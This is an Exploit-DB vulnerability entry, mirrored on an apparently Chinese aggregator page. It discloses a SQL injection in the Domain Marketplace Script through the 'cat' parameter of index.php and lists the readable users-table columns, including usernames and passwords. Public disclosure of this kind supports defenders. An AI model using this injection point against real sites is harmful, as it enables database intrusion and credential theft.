Domain Marketplace Script – SQL Injection

Exploit Database
21 阅读

作者： Ihsan Sencan

日期： 2017-03-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/41582/

# # # # # 
# Exploit Title: Domain Marketplace Script - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: http://scripteen.com/
# Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html
# Demo: http://dwm.domainauctionsscript.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?page=websites_for_sale&cat=[SQL]
# users :userId
# users :data
# users :payment_date
# users :expiration_date
# users :username
# users :password
# users :nume
# users :adresa
# Etc..
# # # # #

last Exploits
Domain Marketplace Script – SQL Injection的更多信息

OLK Web Store 2020 – Cross-Site Request Forgery：
Sitecore – Remote Code Execution v8.2：
Joomla! Component com_packages – SQL Injection：
Vaidya-Mitra 1.0 – Multiple SQLi：
Getsimple CMS 2.01 – Multiple Vulnerabilities：
PHP-Lance 1.52 – ‘subcat’ SQL Injection：
Lisk CMS 4.4 – ‘id’ Multiple Cross-Site Scripting / SQL Injections：
PHP < 8.3.8 - Remote Code Execution (Unauthenticated) (Windows)：